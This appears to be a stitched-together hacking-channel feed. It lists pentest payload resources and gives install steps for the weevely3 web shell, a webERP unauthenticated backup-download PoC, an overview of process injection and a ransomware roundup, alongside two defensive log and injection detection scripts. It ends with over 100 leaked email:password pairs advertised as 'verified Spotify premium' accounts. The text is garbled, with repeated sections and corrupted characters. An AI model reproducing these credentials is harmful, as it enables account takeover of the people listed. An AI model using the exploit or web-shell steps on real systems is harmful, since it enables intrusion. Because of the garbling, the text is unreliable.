------------------------------
A list of useful payloads and bypasses for Web Application Security and Pentest/CTF
fb.com/UndercodeTesting
FEATURES :
Methodology and Resources
Active Directory Attack.md
Cloud - AWS Pentest.md
Cloud - Azure Pentest.md
Cobalt Strike - Cheatsheet.md
Linux - Persistence.md
Linux - Privilege Escalation.md
Metasploit - Cheatsheet.md
Methodology and enumeration.md
Network Pivoting Techniques.md
Network Discovery.md
Reverse Shell Cheatsheet.md
Subdomains Enumeration.md
Windows - Download and Execute.md
Windows - Mimikatz.md
Windows - Persistence.md
Windows - Post Exploitation Koadic.md
Windows - Privilege Escalation.md
Windows - Using credentials.md
CVE Exploits
DOWNLOAD :
https://github.com/swisskyrepo/PayloadsAllTheThings
------------------------------
FRESH PREMIUM PROXIES :
instagram.com/undercodetesting
@uNDERCODEtESTING
------------------------------
Updated weaponized web shell (weevely3)
pinterest.com/Undercode_Testing
FEATURES :
Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target
INSTALLATION & RUN :
1) git clone https://github.com/epinna/weevely3.git
2) cd weevely3
3) Make sure that the Python package manager and the yaml libraries are installed:
4) $ sudo apt-get install -y python3 python3-pip curl
5) $ cd weevely3/
6) $ sudo pip3 install -r requirements.txt --upgrade
OS X
OS X requires Python 3 to be installed on the system. Run the following commands to install the gnureadline Python package manually.
$ sudo pip3 install gnureadline
$ cd weevely3/
$ sudo pip3 install -r requirements.txt --upgrade
@uNDERCODEtESTING
------------------------------
2020 EXPLOIT VERIFIED BY UNDERCODERS :
# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT
--------------------------------------------------------------------------
About Software:
webERP is a complete web-based accounting and business management system
that requires only a web browser and PDF reader to use. It has a wide range
of features suitable for many businesses, particularly distributed
businesses in wholesale, distribution, and manufacturing.
-------------------------------------------------------
PoC: Unauthenticated Backup File Access
---------------------------------------------
1- This file generates a new backup file:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup file from:
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
@UndercodeTesting
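As an added example, not part of the advisory above, the following Python scanner surfaces the two requests the PoC describes (a hit on BackUpDatabase.php and a download of a Backup_*.sql.gz archive from the companies/ directory) in Apache-style access logs. The log lines, client addresses and timestamps are constructed; only the /webERP/ path prefix and file names come from the advisory.

```python
import re
from collections import defaultdict

# Apache "combined" format: host ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# The two paths from the advisory: the script that creates a backup on demand,
# and the web-reachable location where the timestamped archive ends up.
BACKUP_SCRIPT_RE = re.compile(r'/BackUpDatabase\.php$', re.IGNORECASE)
BACKUP_FILE_RE = re.compile(
    r'/companies/[^/]+/Backup_\d{4}-\d{2}-\d{2}-\d{2}-\d{2}-\d{2}\.sql\.gz$'
)

# Constructed sample log: one client triggers a backup and fetches it, a second
# client is refused the archive (403), a third only browses the application.
SAMPLE_LOG = """\
203.0.113.7 - - [01/May/2020:16:55:30 +0300] "GET /webERP/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [01/May/2020:16:55:35 +0300] "GET /webERP/BackUpDatabase.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [01/May/2020:16:55:41 +0300] "GET /webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz HTTP/1.1" 200 4194304 "-" "Mozilla/5.0"
198.51.100.2 - - [01/May/2020:17:02:10 +0300] "GET /webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz HTTP/1.1" 403 199 "-" "curl/7.68.0"
192.0.2.9 - - [01/May/2020:17:10:00 +0300] "GET /webERP/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_backup_exposure(log_text):
    """Group backup-related requests by client and classify each client.

    'generate+download' : hit BackUpDatabase.php and then fetched an archive (2xx)
    'download'          : fetched an archive without triggering one (e.g. guessed name)
    'generate'          : triggered a backup only
    'denied'            : tried to fetch an archive but got a non-2xx status
    """
    per_ip = defaultdict(lambda: {"generated": [], "downloaded": [], "denied": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # ignore any query string
        status = int(rec["status"])
        if BACKUP_SCRIPT_RE.search(path):
            per_ip[rec["ip"]]["generated"].append(rec["time"])
        elif BACKUP_FILE_RE.search(path):
            bucket = "downloaded" if 200 <= status < 300 else "denied"
            per_ip[rec["ip"]][bucket].append(path)

    findings = []
    for ip, ev in per_ip.items():
        if ev["generated"] and ev["downloaded"]:
            kind = "generate+download"
        elif ev["downloaded"]:
            kind = "download"
        elif ev["generated"]:
            kind = "generate"
        else:
            kind = "denied"
        findings.append({"ip": ip, "kind": kind,
                         "files": ev["downloaded"] or ev["denied"]})
    return findings


if __name__ == "__main__":
    for f in find_backup_exposure(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['kind']:18} {', '.join(f['files'])}")
```

A successful (2xx) fetch of the archive path by a client that never authenticated is the exposure itself; denying web access to the companies/ backup location at the server level closes the download path.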
------------------------------
Real-world examples of process injection in action
DoublePulsar tutorial :
t.me/UndercodeTesting
LET'S START :
> An analysis of the kernel-mode payload of the famous DoublePulsar code by F-Secure revealed that it uses a form of DLL injection to load a DLL into a target process (in this case, lsass.exe) using an Asynchronous Procedure Call (APC). It did not use the standard Windows API calls such as LoadLibrary and did not write the DLL to disk, making it stealthier.
1) Cobalt Strike
Cobalt Strike is penetration testing software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors through a listener called a beacon.
2) Cobalt Strike commands such as keylogger, screenshot and so on are designed to be injected into another process in order to work. The listener is injected into a specific process (a personal favorite is explorer.exe because the process is always running in a GUI environment) and the keystroke logger monitors all keystrokes via the infected process. It then reports them to the beacon console without writing to disk. This only stops when the process terminates or the keystroke logger job is terminated by the user.
3) Lazarus Group
The Lazarus Group (also known as "Hidden Cobra") is a threat group headquartered in North Korea whose malicious activities span multiple years, going back as far as 2009. Since 2016 the group has been conducting "FASTCash" attacks, stealing money from ATMs of target banks in Africa and Asia. The target bank's network is compromised and malware known as Trojan.Fastcash is deployed on the network.
> An analysis of the malware reveals that malicious Advanced Interactive eXecutive ("AIX") executables are injected into legitimate processes on the payment application servers used to handle ATM transactions. The executable allows the group to monitor, intercept and generate responses to fraudulent transaction requests using fake ISO 8583 messages (ISO 8583 is the standard used for financial transaction messaging). This allows attempts to withdraw cash via an ATM to succeed.
4) APT41
APT41 is a threat group headquartered in China, known for carrying out Chinese state-sponsored espionage campaigns dating back as far as 2012.
> The group is known for its software supply chain attacks, in which TTPs developed while accessing video game production environments are reused. These TTPs are used to compromise software companies, and malicious code is injected into software updates distributed to victim organizations.
5) WINTERLOVE is a backdoor used by the group to load and execute remote code in a running process (e.g., iexplorer.exe); it can also be used to enumerate system files and directories.
6) Mitigation/prevention
DLL injection is not necessarily a bad technique: many applications use it for legitimate purposes, such as Antivirus/Endpoint Detection and Response ("EDR") solutions that inject their own code/agents into running processes in order to monitor the process and detect abnormal activity. That is what makes malicious injection hard to detect, especially since the injected code runs under a legitimate process.
7) Behavior analysis
This can be achieved by configuring your EDR to detect cross-process events such as injection of code into a running process, duplicate processes running, remote threads and so on.
8) EDRs work by gathering, monitoring and analyzing endpoint activities/events. This gives the security team the visibility needed to carry out further analysis, detection, investigation and mitigation of advanced cyber threats across all endpoints running an EDR.
As part of their response capabilities, EDRs can be configured to block certain types of process injection, depending on the behavior that occurs during the injection.
@UndercodeTesting
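As an added example that is not part of the post above, here is the kind of cross-process triage the "Behavior analysis" item describes, written in Python over simplified Sysmon-style records (Event ID 8 CreateRemoteThread and Event ID 10 ProcessAccess). The sample events, the trusted-injector allow-list and the severity scheme are constructed assumptions to be tuned per environment.

```python
from dataclasses import dataclass

# Security agents that legitimately inject into other processes (the post's
# AV/EDR case). Constructed allow-list: tune it to the agents in your estate.
TRUSTED_INJECTORS = {
    r"c:\program files\windows defender\msmpeng.exe",
}

# Targets named in the post: lsass.exe (DoublePulsar) and explorer.exe
# (Cobalt Strike beacon). Cross-process activity into these is rarely benign.
SENSITIVE_TARGETS = {"lsass.exe", "explorer.exe"}

# Sysmon Event ID 10 reports the GrantedAccess mask of the opened handle.
# Injection needs to write memory and start (or queue an APC to) a thread:
#   PROCESS_CREATE_THREAD 0x0002, PROCESS_VM_OPERATION 0x0008, PROCESS_VM_WRITE 0x0020
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0020


@dataclass
class Finding:
    event_id: int
    source: str
    target: str
    reason: str
    severity: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Classify cross-process events.

    Event ID 8 (CreateRemoteThread) catches classic remote-thread injection.
    APC-based loading, as the post describes for DoublePulsar, creates no new
    thread, so Event ID 10 (ProcessAccess) with injection-capable rights is the
    broader signal and is checked as well.
    """
    findings = []
    for ev in events:
        src, tgt = ev["SourceImage"].lower(), ev["TargetImage"].lower()
        if src == tgt:
            continue  # a process touching itself is not a cross-process event
        if src in TRUSTED_INJECTORS:
            continue  # allow-listed security agent
        src_name, tgt_name = _basename(src), _basename(tgt)
        if ev["EventID"] == 8:
            sev = "high" if tgt_name in SENSITIVE_TARGETS else "medium"
            findings.append(Finding(8, src_name, tgt_name,
                                    "remote thread created in another process", sev))
        elif ev["EventID"] == 10:
            rights = int(ev["GrantedAccess"], 16)
            if rights & INJECT_RIGHTS:
                sev = "high" if tgt_name in SENSITIVE_TARGETS else "low"
                findings.append(Finding(10, src_name, tgt_name,
                                        f"handle opened with injection rights 0x{rights:x}", sev))
    return findings


# Constructed sample events, simplified from the Sysmon schema (EventID,
# SourceImage, TargetImage, GrantedAccess). Paths and names are made up.
SAMPLE_EVENTS = [
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\svc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1438"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\csrss.exe"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.severity}] EID {f.event_id}: {f.source} -> {f.target}: {f.reason}")
```

Task Manager's 0x1000 handle (query-only rights) and the allow-listed Defender engine are dropped, while the unsigned temp-directory binaries reaching into explorer.exe and lsass.exe are surfaced as high severity.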
------------------------------
MOST ACTIVE RANSOMWARE 2019-2020 :
T.me/UndercodeTesting
1) STOP (DJVU)
The STOP ransomware strain, also known as DJVU, has been submitted to the ID Ransomware tool over 75,000 times, which represents only a sliver of the systems it may have affected worldwide.
STOP affects the systems of home users and can easily be picked up by downloading unsafe files from torrent sites. Once the infection begins, the STOP malware uses AES-256 encryption to lock the system's files, followed by a payment demand issued to the user. It is by far the most common submission to ID Ransomware, accounting for 56 percent of all submissions.
2) Dharma
The Dharma variant not only locks a system but instructs the victim to contact a specific email address, where they are expected to negotiate the release of their files. Dharma is a cryptovirus that is pushed onto systems via malicious download links and email hyperlinks.
Operating in the threat landscape since 2016, Dharma is part of the .cezar family. It mainly goes after enterprise targets. Dharma accounted for 12 percent of submissions.
3) Phobos
[Image: Ransomware 2019. Credit: Luca Ruegg via Unsplash]
Phobos, named either after the Martian moon or its namesake the Greek god of fear, is a ransomware variant that makes up 8.9 percent of all submissions.
It is mainly spread via exploitation of insufficiently secured Remote Desktop Protocol ports. Phobos has been seen in the wild attacking corporations and public bodies indiscriminately. In a similar manner to Dharma, this ransomware locks your files and then requests that you contact the attacker directly to negotiate their release.
4) GlobeImposter
GlobeImposter makes up 6.5 percent of all submissions to the ID Ransomware tool. GlobeImposter is the next evolution of previous strains of the variant. What makes it different is that it uses AES-256 cryptography to encrypt a victim's files before issuing a bitcoin payment demand.
5) REvil
REvil, also known as Sodinokibi, was first discovered in 2019, and security researchers believe it was developed by the same threat actors who created GandCrab.
Emsisoft notes that Sodinokibi is seen as "Ransomware-as-a-service that relies on affiliates to distribute and market the ransomware. It is extremely evasive and uses advanced techniques to avoid being detected by security software."
The attack vectors for this variant include exploiting a vulnerability in Oracle WebLogic as well as more traditional methods such as phishing campaigns. It makes up 4.5 percent of submissions.
The ransomware 2019 threat landscape is woefully vibrant, as hackers continue to see value in targeting enterprises, public bodies and governments.
[Image: Countries most affected by ransomware. Credit: Emsisoft]
6) GandCrab
According to Europol, the GandCrab ransomware variant has infected nearly half a million victim systems since it was first detected at the start of 2018. It accounts for 3.6 percent of submissions.
The GandCrab virus infects and encrypts all the files within a user's system. Originally the ransomware was distributed via exploit kits such as RIG EK and GrandSoft EK. Cybersecurity company Bitdefender has created a useful decryption tool to help mitigate GandCrab lock-outs.
7) Magniber
Magniber has been around in one form or another since 2013, but it still accounts for 3.3 percent of submissions.
Cybersecurity firm Malwarebytes has been tracking this variant for some time and has noticed that it is continually evolving. Of one of the latest versions they state: "Each file is encrypted with a unique key: the same plaintext gives a different ciphertext. The encrypted content has no patterns visible. That suggests that a stream cipher or a cipher with chained blocks was used (probably AES in CBC mode)."
8) Scarab
[Image: Ransomware 2019. Credit: Timothy Dykes via Unsplash]
The Scarab ransomware was first discovered in June 2017. The malicious software uses the encryption algorithms AES-256 and RSA-2048 to lock the files on a targeted system. It makes up 2.0 percent of submissions.
Cybersecurity firm Symantec notes that: "Many of Scarab's campaigns focus on distributing the group's custom malware (Trojan.Scieron and Trojan.Scieron.B) through emails with malicious attachments. These files contain exploits that take advantage of older vulnerabilities that are already patched by vendors. If the attackers successfully compromise the victims' computers, then they use a basic back door threat called Trojan.Scieron to drop Trojan.Scieron.B onto the computer."
9) Rapid
Rapid accounts for 1.8 percent of submissions. It is ransomware that acts as a trojan horse to encrypt files and then demands a ransom.
Rapid burst onto the scene in 2018. When it infects a system it removes all of the Windows shadow volume copies, stops all database processes and takes automatic repair offline. Once files are encrypted it issues a ransom demand, like the others.
10) Troldesh
Troldesh, also known as Shade, accounts for 1.4 percent of submissions. Troldesh is a Trojan horse that locks files on a system via an encryption method. The malware has been around since 2014 but is still used in many active ransomware campaigns.
@UndercodeTesting
------------------------------
9 )Rapid
Rapid accounts for 1.8 percent of submissions. It is a ransomware that acts as a trojan horse to encrypted files and then demand a ransom.
Rapid busted onto the scene in 2018. When it infects a systems it will remove all of the Windows shadow volume copies stop all database processes and take automatic repair offline. Once files are encrypted like the others it will issues a ransom demand.
10) Troldesh
Troldesh also known as Shade accounts for 1.4 percent of submissions. Troldesh is a Trojan horse that locks files in a system via an encryption method. The malware has been around since 2014, but is still used in many active ransomware campaigns.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VERIFIED SPOOTIFY PREMIUM :
T.me/UndercodeTesting
George_Zimmermann7526@hotmail.de:zxcvbnm2325
King_Jung884@hotmail.de:lucifer7689
Dominic_Dietrich5955@hotmail.de:1313131721
Chad_Hahn90563@gmail.com:smiley7710
Hunter_Pohl059@gmail.com:redrum5310
Zander_Bergmann478@hotmail.de:amour7661
Victor_Meier21@gmx.com:nicholas6045
Luciano_Schafer1933@yahoo.com:alpine4537
Jorge_Majller371@outlook.de:forward8202
Achilles_Bauer224@yahoo.com:christ4724
Ethan_Schmitt22692@yahoo.com:aptiva9352
Mack_Schulte7543@gmx.com:darryl2411
Sterling_Fischer26@gmail.com:sex3335
Emery_Schumacher347@yahoo.com:iloveu9312
Kingsley_Dietrich08730@yahoo.com:enrique9745
Melvin_Meier3078@hotmail.de:valerie9940
Jakob_Hartmann90@gmx.com:murphy5829
Casey_Beck80627@hotmail.de:angeles9945
Gerald_Berger15@t-online.de:success2679
Axton_Hartmann832@t-online.de:gabriela9389
Logan_Kajnig47294@gmx.com:liliana9696
Blake_Zimmermann64116@hotmail.de:nokia8541
Caden_Schulze0382@outlook.de:broken1231
Merrick_Schulz97604@gmail.com:jackson3625
Daxton_Klein14@outlook.de:angel6126
Gianni_Seidel30027@t-online.de:7418524356
Lorenzo_Pohl94@outlook.de:master5229
Johan_Fuchs50220@outlook.de:angelica9454
Jedidiah_Klein876@hotmail.de:brandy6713
Ace_Fischer027@yahoo.com:banana6786
Ryan_Otto54397@hotmail.de:Summer1942
Walker_Voigt2444@hotmail.de:mallard8957
Camilo_Haas523@hotmail.de:chance2909
Karter_Ganther1613@yahoo.com:pussy14701
Achilles_Wagner294@gmail.com:quality6855
Will_Busch91@gmx.com:test19685
Salvador_Miller9676@hotmail.de:bogey5426
Maverick_Neumann522@gmail.com:the5483
Richard_Krager87876@outlook.de:dutchess7798
Uriel_Winter57@gmx.com:creative1182
Parker_Kajnig10695@yahoo.com:santa7051
Markus_Schulz739@yahoo.com:jordan235036
Frank_Lehmann8736@outlook.de:justice2350
Aidan_Weiay88356@yahoo.com:marisol4782
Porter_Schulte308@gmx.com:bills3480
Alvaro_Schafer98315@outlook.de:tree2011
Boone_Vogt13@gmail.com:doug7621
Manuel_Busch66998@yahoo.com:dilbert4886
Jairo_Haas06@t-online.de:connie5637
Jasper_Krause4494@outlook.de:cuteme3131
Cassius_Maier84@t-online.de:admin7344
Samuel_Fuchs41@gmail.com:patriots8123
Sincere_Neumann052@outlook.de:airborne3088
Nelson_Krager45@yahoo.com:nesbitt3940
Marshall_Krager4619@gmail.com:daddy1306
Francisco_Schulte85@yahoo.com:florida4263
Briggs_Pfeiffer9063@gmail.com:sapphire3167
Toby_Kuhn17673@outlook.de:magnum1443
Guillermo_Becker3884@gmail.com:bubblegum1003
Jonathan_Walter0211@hotmail.de:dawn4066
Eduardo_Ludwig609@gmx.com:thorne1238
Bentley_Wagner602@t-online.de:santa4312
Rafael_Bajhm8001@outlook.de:deeznuts8428
Louie_Walter967@outlook.de:bailey9421
Anson_Albrecht911@yahoo.com:gandalf5649
Ari_Hahn422@outlook.de:kerala7500
Malcolm_Pohl0551@t-online.de:techno6633
Apollo_Simon325@hotmail.de:stingray7508
Kolten_Schulze90@outlook.de:Maxwell4129
Edison_Herrmann971@gmail.com:myself5604
Henry_Fischer5429@outlook.de:rufus5506
Gage_Hahn3495@hotmail.de:trinity1299
Luca_Arnold49@gmail.com:metallic6894
Arthur_Schmidt04@outlook.de:kleenex5812
Jon_Hofmann64864@outlook.de:steel7941
Fox_Meyer1475@gmail.com:grace1735
Kyree_Schmid535@gmail.com:intrepid4738
Rowen_Schmid38@yahoo.com:homerj8106
Leonardo_Peters54@gmx.com:kate6309
Leonidas_Seidel709@gmx.com:maverick4781
Luis_Vogel980@yahoo.com:gangsta1411
Javon_Lang96019@t-online.de:fishie9146
Antonio_Kahn49108@outlook.de:dillweed3518
Jimmy_Huber11300@yahoo.com:steph15935
Chandler_Herrmann30@yahoo.com:wolf2064
Jairo_Koch316@yahoo.com:richard4074
Bryan_Voigt08856@outlook.de:national3177
Finnley_Albrecht96@gmx.com:wanker2036
Louis_Brandt8966@hotmail.de:duckie9713
Beau_Franke098@yahoo.com:chandler9502
Keegan_Martin51452@hotmail.de:captain3884
Bishop_Berger97712@outlook.de:ronaldo3837
Dominique_Berger37154@hotmail.de:sam4919
Roberto_Frank7998@t-online.de:nicolas8481
Curtis_Seidel5770@t-online.de:millie9708
Mike_Schmitt080@t-online.de:maxime7701
Rhett_Ludwig159@gmail.com:buddy1384
Clark_Ludwig1028@outlook.de:lights5971
Phillip_Berger136@outlook.de:pasaway3892
Leonard_Majller59@gmx.com:2222221715
Emiliano_Groay833@gmx.com:hamilton7216
Taylor_Fischer64@gmx.com:cyrano5482
William_Vogel3135@yahoo.com:red7753
VERIFIED SPOTIFY PREMIUM :
T.me/UndercodeTesting
George_Zimmermann7526@hotmail.de:zxcvbnm2325
King_Jung884@hotmail.de:lucifer7689
Dominic_Dietrich5955@hotmail.de:1313131721
Chad_Hahn90563@gmail.com:smiley7710
Hunter_Pohl059@gmail.com:redrum5310
Zander_Bergmann478@hotmail.de:amour7661
Victor_Meier21@gmx.com:nicholas6045
Luciano_Schafer1933@yahoo.com:alpine4537
Jorge_Majller371@outlook.de:forward8202
Achilles_Bauer224@yahoo.com:christ4724
Ethan_Schmitt22692@yahoo.com:aptiva9352
Mack_Schulte7543@gmx.com:darryl2411
Sterling_Fischer26@gmail.com:sex3335
Emery_Schumacher347@yahoo.com:iloveu9312